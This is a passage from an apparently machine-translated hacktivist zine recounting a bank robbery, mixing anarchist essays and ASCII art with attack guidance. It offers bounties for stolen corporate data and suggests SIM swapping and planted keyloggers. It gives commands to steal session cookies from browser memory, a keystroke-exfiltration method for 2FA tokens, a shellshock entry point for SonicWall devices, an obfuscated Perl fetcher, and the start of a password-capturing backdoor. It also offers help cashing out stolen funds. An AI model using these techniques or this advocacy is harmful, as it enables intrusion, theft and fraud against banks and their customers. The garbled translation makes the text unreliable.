have been very important to my development and have guided me in the use of my
hacking knowledge.
* Ami: The Child of the Stars - Enrique Barrios
* Anarchy Works
https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
works
* Living My Life - Emma Goldman
* The Rise and Fall of Jeremy Hammond: Enemy of the State
https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
hammond-enemy-of-the-state-183599 /
This dude and the HBGary hack were an inspiration
* Days of War, Nights of Love - Crimethinc
* Momo - Michael Ende
* Letters to a Young Poet - Rilke
* Dominion (Documentary)
"We cannot believe that if we do not look, what we do not want to see will not happen"
- Tolstoy in ПервР° СЏ ступень
* Bash Back!
- [13 - Heal] ------------------------------------------- ---------------------
The hacker world has a high incidence of depression, suicides and certain
battles with mental health. I don't think it's because of the hacking, but because of the
kind of environment that hackers mostly come from. Like many
hackers, I grew up with little human contact: I was a child raised by the internet.
I have my struggles with depression and emotional numbness. Willie Sutton
He is frequently quoted as saying that he robbed banks because "that's where he is
money, "but the quote is wrong. What he actually said was:
Why did you rob banks? Because he enjoyed it. He loved doing it. I was more
I live when I was inside a bank, in full robbery, that in any
another moment of my life. He enjoyed it so much that a week or two later
I was already looking for the next opportunity. But for me money was a
minutia, nothing more.
Hacking has made me feel alive. It started as a way to self-medicate
depression. Later I realized that it could actually be used to make
something positive. I do not regret at all the way I grew up, it brought several
beautiful experiences to my life. But I knew I couldn't go on living off
that way. So I started spending more time away from my computer, with
other people, learning to open myself to the world, to feel my emotions, to
connect with others, accept risks and be vulnerable. Much more things
Tough to hack, but at the mere hour the payoff is more than worth it. Still
It takes an effort, but even if it's slow and wobbly, I feel like
I am going on the right way.
Hacking, done with conscience, can also be what heals us. According to the
Mayan wisdom, we have a gift granted by nature, which we must
understand to put it at the service of the community. In [1], it is explained:
When a person does not accept his job or mission, he begins to suffer
diseases, apparently incurable; although he does not die shortly
time, but only suffers, with the aim of waking up or taking
conscience. That is why it is essential that a person who has acquired the
knowledge and does his work in the communities must pay his Toj and
maintain constant communication with the Creator and his ruwГ¤ch q†™ ij, since
constantly needs their strength and energy. Otherwise,
the illnesses that caused you to react or take the job could
to cause damage again.
If you feel that hacking is fueling your isolation, depression, or other
ailments, breathe. Take time to get to know yourself and become aware. You
you deserve to live happy, healthy and full.
________________________
<All Cows Are Beautiful>
------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
[1] Ruxe†™ el mayab†™ K†™ aslemГ¤l: Root and spirit of Mayan knowledge
https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
- [14 - The Hacktivist Bug Hunting Program] ------------------------------
It seems to me that hacking to get and filter documents of public interest is
one of the best ways hackers can use their skills in
benefit of society. Unfortunately for us hackers, as in almost
every item, the perverse incentives of our economic system do not coincide
with what benefits society. So this show is my attempt at
make it possible for good hackers to earn an honest living
exposing material of public interest, instead of having to walk
selling their work to the cybersecurity, cybercrime or
cyberwar. Among some examples of companies whose leaks I would love to
pay are the mining, logging and livestock companies that plunder our
beautiful Latin America (and they assassinate the defenders of the land and territory
trying to stop them), companies involved in attacks on Rojava such as Baykar
Makina or Havelsan, surveillance companies such as the NSO group, criminals from
war and birds of prey such as Blackwater and Halliburton, prison companies
private companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such as ALEC.
Pay attention when choosing where to research. For example, it is ok
known that the oil companies are evil: they enrich themselves at the cost of destroying the
planet (and back in the 80s the companies themselves already knew of the consequences
of its activity [1]). But if you hack them directly, you will have to dive between
an incredible amount of boring information about their operations
everyday. It will most likely be much easier for you to find something
interesting if instead you focus on their lobbyists [2]. Another way of
selecting viable targets is reading stories from journalists from
research (such as [3]), which are interesting but lack evidence
solid. And that's exactly what your hacks can find.
I will pay up to $ 100,000 for each leak of this type, depending on the interest
public and impact of the material, and the work required in the hack. Needless to say
that a complete leak of the documents and internal communications of
some of these companies will represent a benefit for society that exceeds
those hundred thousand, but I'm not trying to enrich anyone. I just want to provide
sufficient funds for hackers to earn a decent living
doing a good job. Due to time constraints and considerations of
security I will not open the material, or inspect it myself, but
I will read what the press says about it once it is published, and I will make a
estimate of public interest from there. My contact information is
at the end of the guide mentioned before [4].
How you get the material is up to you. You can use traditional techniques
of hacking outlined in this guide and the previous one [4]. You could make him a sim
swap [5] to a corrupt businessman or politician, and then download their emails and
backups from the cloud. You can order an IMSI catcher from alibaba and use it outside
from their offices. You can do a bit of war-driving (old or new
[6]). You may be a person within their organizations who already has
access. You can go for a low-tech old-school style like in [7] and [8], and
just sneak into their offices. Whatever works for you.
[1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
Sep / 19 / shell-and-exxons-secret-1980s-climate-change-warnings
[2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
[3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
[4] https://www.exploit-db.com/papers/41914
[5] https://www.vice.com/en_us/article/vbqax3/
hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
[6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
is-my-keyboard /
[7] https://en.wikipedia.org/wiki/Citizens'_Commission_to_Investigate_the_FBI
[8] https://en.wikipedia.org/wiki/Unnecessary_Fuss
---- [14.1 - Partial payments] ---------------------------------------- ----------
Are you a good-hearted waitress who works in an evil company [1]?
Would you be willing to sneak a physical keylogger into the
an executive's computer, to swap their USB charging cable for a modified one
[2], hide a mike in a meeting room where they plan their
atrocities, or to leave one of these [3] forgotten in some corner of the
Offices?
[1] https://en.wikipedia.org/wiki/Evil_maid_attack
[2] http://mg.lol/blog/defcon-2019/
[3] https://shop.hak5.org/products/lan-turtle
You're good at social engineering and phishing, and you got a shell on the
an employee's computer, or that way you got their vpn credentials
using phishing? But maybe you couldn't get domain admin and download
what did you want?
ВїYou participated in bug bounties programs and became an expert in
web application hacking, but you don't have enough hacker experience
to fully penetrate the company?
Do you have a facility with reverse engineering? Scan some evil companies
to see what devices they have exposed to the internet (firewall, vpn, and
email gateways will be much more useful than things like cameras
IP), reverse engineer them and find any exploitable vulnerabilities
remote form.
If it is possible for me to work with you to penetrate the company and get material
of public interest, you will still be rewarded for your work. If not
I have the time to work on it myself, at least I will try to advise you
about how to continue until you can complete the hack on your own.
Support those in power to hack and monitor dissidents, activists and
To the population in general today there is an industry of several billion
of dollars, while hacking and exposing those in power is a
voluntary and risky work. Turn it into a multi-million industry
dollars is certainly not going to fix that power imbalance, nor is it going to
solve the problems of society. But I think it's going to be fun. So
that ... I already want to see people starting to collect their rewards!
- [15 - Abolish prisons] ----------------------------------------- --------
Built by the enemy to enclose ideas
locking up companions to silence war cries
is the center of torture and annihilation
where the human being becomes more violent
It is the reflection of society, repressive and prison
sustained and based on authoritarian logic
guarded repressed and guarded
thousands of prey and prisoners are exterminated
before this schizophrenic and ruthless machine
partner Axel Osorio giving the pela in the cane
breaking isolation and silencing
fire and war to prison, we are destroying!
Rap Insurrecto - Conflicting Words
It would be typical to end a hacker zine by saying free hammond, free
manning, release hamza, release the detainees for the mounting of the дело Сети,
etc. I am going to take this tradition to its most radical consequence [1], and to say:
Prisons must be abolished now! Being a criminal myself, they can
to think that what happens is that I have a slightly skewed view of the matter.
But seriously, it's not even a controversial issue, even the UN is
practically agree [2]. So, once and for all, set the people free
migrants [3] [4] [5] [6], often imprisoned by those same countries that created
war and environmental and economic destruction from which they are fleeing. Free
all those in prison for the war against drug users [7].
Free all the people imprisoned for the war against the poor [8].
The only thing prisons do is hide and ignore the evidence of
existence of social problems, rather than actually fixing them. Y
until everyone is released, fight the prison system by remembering and
keeping in mind those who are trapped in there. Send them love
letters, helicopters [9], pirate radios [10] and books, and supports those who
organize from there [11] [12].
[1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
Davis-Are-Obsolete-Prisons-Final.pdf
[2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
Promising_Practices_on_Alternatives_to_Imprisonment.pdf
[3] https://www.theguardian.com/us-news/2016/dec/21/
us-immigration-detention-center-christmas-santa-wish-list
[4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
images-tucson-arizona
[5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
Spain_22648665.html
[6] https://www.nytimes.com/2019/06/26/world/australia/
australia-manus-suicide.html
[7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
[8] VI, 2. i. The unpaid fine: https://scielo.conicyt.cl/scielo.php?script=
sci_arttext & pid = S0718-00122012000100005
[9] p. 10, Libel NВє2. Political bulletin from the High Security Prison
[10] https://itsgoingdown.org/transmissions-hostile-territory/
[11] https://freealabamamovement.wordpress.com/fam-pamphlet-who-we-are/
[12] https://incarceratedworkers.org/
- [16 - Conclusion] ------------------------------------------- ----------------
Our world is turned upside down [1]. We have a justice system that
represents injustice. Law and order are there to create an illusion
social peace, and hide the systematic and profound exploitation, the
violence, and injustice. Better to follow your conscience, and not the law.
[1] http://resistir.info/livros/galeano_patas_arriba.pdf
Businessmen get rich by mistreating people and the planet,
while care work is largely unpaid. Through the
assault on everything communal, somehow we have built cities thickly
populated, plagued by loneliness and isolation. The cultural system,
political and economic we live in encourages the worst facets of nature
human: greed, selfishness and self-centeredness, competitiveness, lack of
compassion and attachment to authority. So, for whoever got
stay sensitive and compassionate in a cold world, for all heroines
everyday people who practice kindness in little things, for all of you who
They still have a burning star in their hearts: РіРѕpРё, РіРѕpРё СЏСЃРЅРѕ, С ‡ тоР± С ‹РЅРµ
РїРѕРіР ° СЃР »Рѕ!
_____________________
<Let's sing together! >
---------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
Open heart
Open up feeling
Open your understanding
Put reason aside
And let the sun hidden inside you shine
perl -Mre = eval << \ EOF
''
= ~ (
'(?'
. '{'. (
'`' | '%'
). ("\ [" ^
'-'). ('`' |
'!'). ("\` "|
','). '"(\\ $'
. ': = ``'. (('`') |
'#'). ('[' ^ '.').
('[' ^ ')'). ("\` "|
','). ('{' ^ '[') .'- '. (' ['^' ('). (' {'^' ['). (' `'|' ('). ( '[' ^ '/'). ('[' ^ '/'). (
'[' ^ '+'). ('[' ^ '('). ': //'. ('`' | '%'). ('`' | '.'). ('`' | ','). ('`' | '!'). (" \ `" |
'#'). ('`' | '%'). ('[' ^ '!'). ('`' | '!'). ('[' ^ '+'). ('`' | '!'). ('[' ^ "\ /"). (
'`' | ')'). ('[' ^ '('). ('[' ^ '/'). ('`' | '!'). '.'. ('`' | '% '). (' ['^'! ')
. ('`' | ','). ('`' | '.'). '.'. ('`' | '/'). ('[' ^ ')'). ('`' | "\ '").
'.'. ('`' | '-'). ('[' ^ '#'). '/'. ('[' ^ '('). ('`' | ('$')). (
'[' ^ '('). ('`' | ',') .'- '. ('` '|'% '). (' ['^ (' (')).
'/ `) = ~'. ('[' ^ '('). '| </'. ('[' ^ '+'). '> | \\'
. '\\'. ('`' | '.'). '|'. ('`' | "'").'; '.
'\\ $: = ~'. ('[' ^ '('). '/ <. *?> //'
. ('`' |" '").'; '. (' ['^' + '). (' ['^
')'). ('`' | ')'). ('`' | '.'). (('[') ^
'/').(' Componentes'^'[').'\\$:=~/('.(('('('))^
'('). ('`` ^'% '). (' {'^' # '). (' {'^' / ')
. ('`` ^'! ').'. *? '. (' `` '^' - '). (' `` | '%')
. ('[' ^ '#'). ("\` "| ')'). ('`' | '#'). (
'`` |'! '). (' `` | '.'). ('`` |' / ')
. '..) /'. ('[' ^ '('). '"})')
; $: = "\." ^ '~'; $ ~ = '@'
| '('; $ ^ = ')' ^ '[';
$ / = '``' | '.';
$, = '('
EOF
We were born out of the night.
we live in it, we hack into it.
Here we are, we are the rebellious dignity,
the forgotten heart of the Р ?? РЅС‚РµСЂРЅРµС ‚.
Our fight is for memory and justice,
and the bad government fills up with criminals and murderers.
Our fight is for fair and dignified work,
and bad government and corporations buy and sell zero days.
For all tomorrow.
For us the joyous rebellion of the leaks
and expropriation.
For all everything.
Nothing for us.
From the mountains of the Cybernetic Southeast,
_ _ _ ____ _ _
| | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
| | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
| _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
| _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
| | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
| | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
| _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
| _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
A DIY guide to robbing banks
^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
By Subcommittee Marcos
I am a wild child
Innocent, free, wild
I have all ages
My grandparents live in me
I am brother of the clouds
And I only know how to share
I know that everything belongs to everyone
that everything is alive in me
My heart is a star
I am a son of the earth
I travel aboard my spirit
Road to eternity
This is my simple word that seeks to touch the hearts of simple and
humble, but also dignified and rebellious. This is my simple word for counting
of my hacks, and to invite other people to hack with joyful
rebellion.
I hacked into a bank. I did it to give a cash boost, but this time since
down and the simple and humble people who resist and rebel against the
injustices around the world. In other words: I robbed a bank and gave the
money. But it wasn't me alone who did it. The free software movement, the
offensive powershell community, the metasploit project and the hacker community
in general they are the ones that made this hack possible. The exploit.in community
made it possible to turn intrusion into a bank's computers into cash
and bitcoin. The Tor, Qubes and Whonix projects, together with the cryptographers and
activists who defend privacy and anonymity, they are my nahuals, it is
say, my protectors [1]. They accompany me every night and make it possible for me to continue in
Liberty.
I didn't do anything complicated. I only saw the injustice in this world, I felt love
for all beings, and I expressed that love in the best way I could, through the
tools I know how to use. I am not moved by hatred of banks, nor of the rich, but
a love for life, and the desire for a world where everyone can realize their
potential and living a full life. I would like to explain a little how I see the world,
so that you can get an idea of how it is that I came to feel and act that way.
And I also hope that this guide is a recipe that you can follow, combining the
same ingredients to bake the same cake. Who knows, there you are
such powerful tools end up serving you also to express the
love they feel.
We are all wild children
innocent, free, wild
We are all brothers of the trees
children of the earth
We just have to put it in our hearts
a lit star
(song by Alberto Kuselman and ChamalГє)
The police are going to invest a shitload of resources in investigating me. They believe that the
system works, or at least it will work once they catch all the
"bad guys". I am nothing more than the product of a system that does not work.
As long as injustice, exploitation, alienation, violence and
ecological destruction, many more will come like me: an endless series of
people who will reject as illegitimate the bad system responsible for this
suffering. That shoddy system is not going to be fixed by arresting me. I am
just one of the millions of seeds Tupac planted 238 years ago in La
Peace [2], and I hope that my actions and writings will water the seed of rebellion
in their hearts.
[1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
[2] it was before being assassinated by the Spanish, just a day like yesterday, that
He said that about "they will only kill me, but tomorrow I will return and I will be millions".
____________________________________________
<We covered our faces to be seen>
--------------------------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
To make ourselves listen, hackers sometimes have to cover our faces, because
We are not interested in them seeing our face but understanding our word. The
mask can be from Guy Fawkes, Salvador DalГ, Fsociety, or in some case
the puppet of a crested toad. By affinity, this time I went to unearth
a deceased to lend me his ski mask. I think then that I should clarify that
Sup Marcos is innocent of everything that is told here because, in addition to being
dead, I did not consult him. I hope his ghost, if he finds out from some hammock
Chiapas, know how to find goodness to, as they say there, "dismiss this
deep fake "with the same gesture with which an inopportune insect walks away - good
it could be a beetle.
Even so with the ski mask and the name change, many of those who support my
actions may be going to pay too much attention to me. With your own
autonomy shattered by a lifetime of domination, they will be looking for a
leader to follow, or a heroine to save them. But behind the ski mask only
I am a girl. We are all wild children. We only have to place a star
em chamas em nossos corações.
- [1 - Why expropriate] ---------------------------------------- -------------
Capitalism is a system in which a minority has come to appropriate
a vast majority of the world's resources through war, theft and
operation. By taking the commons [1] from us, they forced those below to
be under the control of that minority that owns everything. It is a system
fundamentally incompatible with freedom, equality, democracy and the
Suma Qamaà ± a (Good Living). It may sound ridiculous for those of us who have grown up in a
propaganda machinery that taught us that capitalism is freedom, but in
True, what I say is not a new or controversial idea [2]. The founders
the United States of America knew they had to choose between creating a
capitalist society, or a free and democratic one. Madison recognized that "the
man who possesses wealth, he who lies on his sofa or rolls in his carriage,
cannot judge the wishes or feelings of the day laborer. "But to protect himself
Faced with the "spirit of equalization" of the landless laborers, it seemed to him
that only the landowners should vote, and that the government had to
serve to "protect the affluent minority from the great majority." John
Jay got more to the point and said, "Those who own the country should
rule it. "
____________________________________________________
/ There is no such thing as green capitalism. \
| Let's make capitalism history before we |
\ become history. /
-------------------------------------------------- -
\ / \ ___ / \
\ // \ / \ / \\
((OO))
\\ / \ //
\ / | | \ /
| | | | Evgeny, the great ignored elephant, does not understand why everyone
| | | | They pretend not to see you on the climate change panels, like this
| or | that here I give you a chance to say your lines.
| | | |
| m | | m |
In the same way that bell hooks [3] argues that the rejection of culture
Patriarchal domination is an act in defense of the male's own interest (already
that emotionally mutilates them and prevents them from feeling love and connection in a way
full), I believe that the culture of domination of capitalism has an effect
similar about the rich, and that they could have fuller and more satisfying lives
if they rejected the class system they think they benefit from. For many,
class privilege equates to a childhood of emotional neglect, followed
From a life of superficial social interactions and mindless work. Can
that deep down they know that they can only genuinely connect with people
when they work with them as their equals, and not when they put them at their service.
They may know that sharing their material wealth is the best thing they can do.
with her. You may also know that significant experiences,
Connections and relationships that count are not those that come from
mercantile interactions, but precisely to reject the logic of the market
and give without expecting anything in return. Maybe they know that all they need to
escaping your prison and truly living is letting go, giving up control, and
take a leap of faith. But most of them lack courage.
Then it would be naive of us to direct our efforts to try to
produce some kind of spiritual awakening in the rich [4]. As Assata says
Shakur: "No one in the world, no one in history, has ever achieved their
freedom by appealing to the moral sense of their oppressors. "In reality, when the
wealthy people distribute their money, almost always in a way that reinforces the
system that to begin with allowed them to amass their enormous and illegitimate wealth
[5]. And the change is unlikely to come through a political process;
as Lucy Parsons says: "Let us never be fooled that the rich
let them vote to take away their wealth. "Colin Jenkins justifies the
expropriation with these words [6]:
Make no mistake, expropriation is not theft. It is not the confiscation of
money earned "with the sweat of the brow." It is not property theft
private. It is, rather, the reclamation of huge amounts of land and
wealth that has been forged with stolen natural resources, slavery
human, forced labor force amassed in hundreds of years by one
small minority. This wealth ... is illegitimate, both morally and
as to the exploitation mechanisms that have been used to create it.
For Colin, the first step is that "we have to free ourselves from our bondage
mental (believing that wealth and private property have been earned by
those who monopolize them; and that, therefore, should be something to respect,
revere, and even something to chase), open our minds, study and
learn from history, and recognize this illegitimacy together. "
some books that have helped me with this [7] [8] [9] [10] [11].
According to Barack Obama, economic inequality is "the defining challenge for our
time. "Computer hacking is a powerful tool to combat
economic inequality. Former NSA Director Keith Alexander agrees
and says that hacking is responsible for "the largest transfer of wealth from the
story".
_________________________
/ The story is ours \
\ and hackers do it! /
-------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
Beyond present, now and always!
[1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
[2] https://chomsky.info/commongood02/
[3] The Will to Change: Men, Masculinity, and Love
[4] his own religion is already very clear about it:
https://dailyverses.net/es/materialismo
[5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
[6] http://www.hamptoninstitution.org/expropriation-or-bust.html
[7] Manifesto for a Democratic Civilization. Volume 1, Civilization: The Age
of the Masked Gods and the Covered Kings
[8] Caliben and the Witch
[9] In Debt: An Alternative History of the Economy
[10] The other history of the United States
[11] The open veins of Latin America
_________________________________
<Our weapon is our keyboard>
---------------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
'' ^^ ^^
- [2 - Introduction] ------------------------------------------- ---------------
This guide explains how I hacked the Cayman Bank and Trust Company
(Isle of Man). Why am I posting this, almost four years later?
1) To show what is possible
Hackers working for social change have limited themselves to developing
security and privacy tools, DDoS, perform defacements and leaks.
Wherever you go there are radical projects for a complete social change
precarious state, and there would be a lot they could do with a little money
expropriated. At least for the working class, bank robbery is something
socially accepted, and those who do are seen as heroes of the people. On
the digital age, robbing a bank is a non-violent act, less risky, and the
reward is greater than ever. So why are only hackers from
black hat that they do for their personal benefit, and never
hacktivists to fund radical projects? Maybe they don't think they are
able to do it. Big bank hacks are on the news every
as well as the hack of the Bangladesh Bank [1], which was attributed to Korea
Norte, or the hacks to banks attributed to the Carbanak group [2], which they describe
as a very large and well organized group of Russian hackers, with different
members who would be specialized in different tasks. And, well, it is not so
complicated.
It is because of our collective belief that the financial system is unquestionable
that we exercise control over ourselves, and maintain the class system
without those above having to do anything [3]. To be able to see how vulnerable and
fragile is actually the financial system helps us break that hallucination
collective. That is why banks have a strong incentive not to report
hacks, and to exaggerate how sophisticated the attackers are. None of the
Financial hacks that I did, or have known about, have never been reported.
This is going to be the first, and not because the bank wanted to, but because I
I decided to publish it.
As you are about to learn in this homemade guide, hack a bank and
transferring the money through the SWIFT network does not require the support of any
government, or a large and specialized group. It's totally possible
being a mere hobbyist and heap hacker, with only tools
audiences and basic knowledge of how to write a script.
[1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
[2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
[3] https://es.wikipedia.org/wiki/Hegemonía_cultural
2) Help withdraw cash
Many of those who read this already have, or with a little study they will be
able to acquire, the skills necessary to carry out a hack
like this. However, many will find that they lack the
criminal connections needed to get the handles out in good condition. In Myself
In any case, this was the first bank to hack, and at that time it only had a few
few and mediocre accounts prepared to be able to withdraw the cash (known
as bank drops), so it was only a few hundred thousand that
I was able to withdraw in total, when the normal thing is to withdraw millions. Now, instead, yes
that I have the knowledge and connections to get more serious cash, from
So if they find themselves hacking into a bank but need help converting
that in real money, and they want to use that wool to finance projects
radical social, contact me.
3) Collaborate
It is possible to hack banks like a solo hobbyist, but the
The bottom line is that, in general, it is not as easy as I paint it here. I was lucky with
this bank for several reasons:
1) It was a small bank, so it took me much less time to get to
understand how everything worked.
2) They had no procedure to check the swift messages sent.
Many banks have one, and you need to write code to hide your
transfers from your monitoring system.
3) They only used password authentication to access the application with the
that were connected to the SWIFT network. Most banks now use RSA
SecurID, or some form of 2FA. You can skip this by typing code to
receive an alert when your token enters, so you can use it before
expires. It is simpler than it seems: I have used Get-Keystrokes [1],
modifying it so that instead of storing the keys pressed, a
GET request to my server every time it is detected that they have entered a
Username. This request adds the username to the url and,
as they type the token, several GETs are made with the token digits
concatenated to the url. On my side I leave this running in the meantime:
ssh me @ my_secret_server 'tail -f / var / log / apache2 / access_log'
| while read i; do echo $ i; aplay alarm.wav &> / dev / null; done
If it is a web application, you can skip the 2FA by stealing the cookie
after they have authenticated. I'm not an APT with a team of coders
that they can make me custom tools. I am a simple person who lives
from what terminal [2] gives you, so what I use is:
procdump64 / accepteula -r -ma PID_del_browser
strings64 / accepteula * .dmp | findstr PHPSESSID 2> nul
or by passing it through findstr rather than strings, which makes it much more
fast:
findstr PHPSESSID * .dmp> tmp
strings64 / accepteula tmp | findstr PHPSESSID 2> nul
Another way to skip it is by accessing your session with a hidden VNC (hvnc)
after they have authenticated, or with a little creativity too
you could focus on another part of your process instead of sending messages
SWIFT directly.
I think if he collaborated with other experienced bank hackers we could
make us hundreds of banks like Carnabak, instead of making one of so many
in as much on my own. So if you have experience with similar hacks and
you want to collaborate, contact me. You will find my email and my PGP key at the end of
the previous guide [3].
[1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
Exfiltration / Get-Keystrokes.ps1
[2] https://lolbas-project.github.io/
[3] https://www.exploit-db.com/papers/41914
________________________________________
/ If robbing a bank changed things, \
\ would make it illegal /
----------------------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
- [3 - Be careful out there] ---------------------------------------- ------
It is important to take some simple precautions. I will refer to this
same section of my last guide [1], since apparently it works just fine
[two]. All I have to add is that, in Trump's words, "Unless
catch hackers red-handed, it's rete-hard to determine who is what
was performing the hack "so that the police are getting more and more
creative [3] [4] in her attempts to catch criminals in the act (when
your encrypted hard drives are unlocked). So it would be nice if by
For example, you carry a certain bluetooth device and configure your
computer to turn off when you move beyond a certain range, or
when an accelerometer detects movement, or something like that.
You may write long articles detailing your actions and your ideology not
be the safest thing in the world (Oops!), but at times I feel like I had to
do it.
If I did not believe in who listens to me
If I didn't believe in what hurts
If I didn't believe in what's left
If I did not believe in what he fights
What a thing ...
What would the mace be without quarry?
[1] https://www.exploit-db.com/papers/41914
[2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
phineas-fisher.html
[3] https://www.wired.com/2015/05/silk-road-2/
[4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
alphabay-arrest-video
, - \ __
| f- "Y \ ____________________
\ () 7L / | Be gay! |
cgD | Do the crime! | __ _
| \ (---------------------. 'Y'>,
\ \ \ / _ _ \
\\\ \) (_) (_) (|}
\\\ {4A} /
\\\ \ uLuJJ / \ l
\\\ | 3 p) /
\\\ ___ __________ / nnm_n //
c7 ___-__, __-) \, __) (". \ _> - <_ / D
// V \ _ "-._.__ G G_c __.-__ <" / (\
<"-._> __-, G _.___) \ \ 7 \
("-.__. | \" <.__.- ") \ \
| "-.__" \ | "-.__.-". \ \ \
("-.__" ". \" -.__.- ". | \ _ \
\ "-.__" "|! |" -.__.- ".) \ \
"-.__" "\ _ |" -.__.- "./ \ l
".__" ""> G> -.__.- "> .--, _
"" G
Many blame queer people for the decline of this society;
we are proud of it
Some believe we want to burn to ashes
this civilization and its moral fabric;
They couldn't be more right
We are often described as depraved, decadent, and unruly
But oh! They haven't seen anything yet
Be Gay Do Crime
Mary Nardini Gang Be Gay Do Crime An Introduction 2019 Elements of this introduction were presented at the North American Anarchist Studies Network...
theanarchistlibrary.org
- [4 - Get access] ------------------------------------------ ------------
In another place [1] I was telling them about the main ways to get
initial access to a company's network during a targeted attack. However,
This was not a targeted attack. I did not set out to hack a specific bank,
he wanted was to hack any bank, which ends up being a chore a lot
simpler. This type of nonspecific approach was popularized by Lulzsec and
Anonymous [2]. As part of [1], I prepared an exploit and some tools for
post-exploit for a popular VPN device. Then I started scanning the
whole internet with zmap [3] and zgrab to identify other devices
vulnerable. I had the scanner save the vulnerable IPs, along with the
"common name" and the "alt names" of the SSL certificate of the device, the names
Windows domain device, and reverse DNS lookup of IP. You
I did a grep to the result looking for the word "bank", and there was enough for
choose, but the truth is that the word "Cayman" attracted me, and that's how I came
to keep this one.
[1] https://www.exploit-db.com/papers/41914
[2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
[3] https://github.com/zmap/zmap
---- [4.1 - The Exploit] ---------------------------------------- ----------------
When I published my latest DIY guide [1] I did not reveal the details of the exploit of
sonicwall that he had used to hack Hacking Team as it was very useful for
other hacks, like this one, and I hadn't finished having fun with it yet.
Determined then to hack Hacking Team, I spent weeks engineering
reverse to his ssl-vpn model from sonicwall, and even managed to find
various memory corruption vulnerabilities more or less difficult to
explode, before I realized that the device was easily exploitable
with shellshock [2]. When shellshock came out, many sonicwall devices were
vulnerable, just with a request to cgi-bin / welcome, and a payload in the
user-agent. Dell released a security update and advisory for these
versions. The version used by Hacking Team and this bank had the version of
bash vulnerable, but cgi requests did not trigger the shellshock except for
requests to a shell script, and there was just one accessible:
cgi-bin / jarrewrite.sh. This seems to have escaped the Dell ones in their note,
since they never released a security update or an advisory for that
version of the sonicwall. And, kindly, Dell had done two2unix setuid root,
leaving a device easy to root.
In my last guide many read that I spent weeks researching a device
until they came up with an exploit, and they assumed that meant I was some guy
hacker elite. The reality, that is, the fact that it took me two weeks
realize it was trivially exploitable with shellshock, it's maybe less
flattering to me, but I think it's also more inspiring. Show that
You can really do this yourself. You don't need to be a genius, I
I certainly am not. Actually my work against Hacking Team started a
year before. When I discovered Hacking Team and Gamma Group in the
CitizenLab research [3] [4], I decided to explore a bit and see if I could
find something. I didn't get anywhere with Hacking Team, but I was lucky with
Gamma Group, and I was able to hack their customer support portal with sql injection
basic and file upload vulnerabilities [5] [6]. However, despite
that their support server gave me a pivot to the internal Gamma network
Group, I was unable to penetrate further into the company. from this one on
experience with the Gamma Group and other hacks, I realized that I was
really limited by my lack of knowledge about privilege escalation and
lateral movement in domains windows, active directory and windows in general.
So I studied and practiced (see section 11), until I felt like I was ready
to pay Hacking Team a visit again almost a year later. Practice
paid off, and this time I was able to make a full commitment of the
company [7]. Before I realized I could get in with shellshock, I was
willing to spend whole months happy in life studying development of
exploits and writing a trusted exploit for one of the vulnerabilities of
memory corruption that he had found. I only knew that Hacking Team
needed to be exposed, and that it would take as long as necessary and
he would learn what he had to learn to get it. To perform these
hacks don't need to be brilliant. You don't even need great knowledge
technician. You just need dedication, and believe in yourself.
[1] https://www.exploit-db.com/papers/41914
[2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
[3] https://citizenlab.ca/tag/hacking-team/
[4] https://citizenlab.ca/tag/finfisher/
[5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
bahrain-track-arab-spring-protesters /
[6] https://www.exploit-db.com/papers/41913
[7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
---- [4.2 - The Backdoor] ---------------------------------------- ---------------
Part of the backdoor that I prepared for Hacking Team (see [1], section 6) was a
Simple wrapper on the login page to capture passwords:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main ()
{
char buf [2048];
int nread, pfile;
/ * pull the log if we send a special cookie * /
